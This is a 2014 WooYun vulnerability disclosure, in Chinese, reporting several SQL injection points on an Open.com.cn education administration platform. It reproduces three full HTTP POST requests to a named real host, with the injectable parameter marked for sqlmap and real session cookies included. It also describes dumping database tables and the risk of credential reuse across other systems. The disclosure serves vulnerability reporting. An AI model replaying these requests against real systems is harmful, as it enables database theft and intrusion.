当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-060349

漏洞标题:奥鹏教育某平台多处SQL注入漏洞,其数据可引发连锁反应

相关厂商:open.com.cn

漏洞作者: 酱油甲

提交时间:2014-05-12 12:06

修复时间:2014-06-26 12:06

公开时间:2014-06-26 12:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-05-12: 细节已通知厂商并且等待厂商处理中
2014-05-12: 厂商已经确认,细节仅向厂商公开
2014-05-22: 细节向核心白帽子及相关领域专家公开
2014-06-01: 细节向普通白帽子公开
2014-06-11: 细节向实习白帽子公开
2014-06-26: 细节向公众公开

简要描述:

奥鹏教育某平台多处SQL注入漏洞,其数据可引发连锁反应

详细说明:

奥鹏教育某平台多处SQL注入漏洞,其数据可引发连锁反应
注入点1:
构造post包:

POST /ajax/Open.Business.Base.AjaxMethod,Open.ashx?_method=GetRecruitBatchListAll&_session=r HTTP/1.1
Host: eduadmin.open.com.cn
Proxy-Connection: keep-alive
Content-Length: 31
Origin: http://eduadmin.open.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Referer: http://eduadmin.open.com.cn/LearningCenter/administer/QQ_Search.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: ASP.NET_SessionId=asj1uonmn040jx550quob0y5; __utma=209232844.700972994.1399801096.1399801096.1399801096.1; __utmb=209232844.1.10.1399801096; __utmc=209232844; __utmz=209232844.1399801096.1.1.utmcsr=baoming.open.com.cn|utmccn=(referral)|utmcmd=referral|utmcct=/search-123'.aspx; looyu_id=55111ad412db9572ffc2f9365616c9ae49_13043%3A2; looyu_13043=v%3A7246cf3d2037150fe84761024427b5fbc5%2Cref%3Ahttp%253A//baoming.open.com.cn/search-123%2527.aspx%2Cr%3A%2Cmon%3Ahttp%3A//m154.looyu.com/monitor
_StudyType=01*
_UniversityCode=


SQLMAP可跑出:

1.jpg


数据表非常多:

3.jpg


通过下载部分数据(用于证明)可以看到,
其数据将会由于同一管理员密码撞库的影响,导致其他系统被攻击:
这里已经打上马赛克,请勿担心~~~

4.jpg


5.jpg


同样存在注入漏洞的地方还有:
2。构造如下数据包:

POST /ajax/Open.Business.Base.AjaxMethod,Open.ashx?_method=GetSpecialtyList&_session=r HTTP/1.1
Host: eduadmin.open.com.cn
Proxy-Connection: keep-alive
Content-Length: 65
Origin: http://eduadmin.open.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Referer: http://eduadmin.open.com.cn/LearningCenter/administer/QQ_Search.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: ASP.NET_SessionId=asj1uonmn040jx550quob0y5; __utma=209232844.700972994.1399801096.1399801096.1399801096.1; __utmb=209232844.1.10.1399801096; __utmc=209232844; __utmz=209232844.1399801096.1.1.utmcsr=baoming.open.com.cn|utmccn=(referral)|utmcmd=referral|utmcct=/search-123'.aspx; looyu_id=55111ad412db9572ffc2f9365616c9ae49_13043%3A2
_StudyType=01*
_RecruitBatchID=
_LcenterCode=C0901001
_LevelID=


3.构造如下数据包:

POST /ajax/Open.Business.Base.AjaxMethod,Open.ashx?_method=GetRecruitBatchListAll&_session=r HTTP/1.1
Host: eduadmin.open.com.cn
Proxy-Connection: keep-alive
Content-Length: 31
Origin: http://eduadmin.open.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Referer: http://eduadmin.open.com.cn/LearningCenter/administer/QQ_Search.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: ASP.NET_SessionId=asj1uonmn040jx550quob0y5; __utma=209232844.700972994.1399801096.1399801096.1399801096.1; __utmb=209232844.1.10.1399801096; __utmc=209232844; __utmz=209232844.1399801096.1.1.utmcsr=baoming.open.com.cn|utmccn=(referral)|utmcmd=referral|utmcct=/search-123'.aspx; looyu_id=55111ad412db9572ffc2f9365616c9ae49_13043%3A2; looyu_13043=v%3A7246cf3d2037150fe84761024427b5fbc5%2Cref%3Ahttp%253A//baoming.open.com.cn/search-123%2527.aspx%2Cr%3A%2Cmon%3Ahttp%3A//m154.looyu.com/monitor
_StudyType=01*
_UniversityCode=

漏洞证明:

涉及多个数据库:

2.jpg


这里已经打上马赛克,请勿担心~~~

4.jpg


5.jpg

修复方案:

过滤

版权声明:转载请注明来源 酱油甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-05-12 16:47

厂商回复:

已有漏洞,未处理

最新状态:

暂无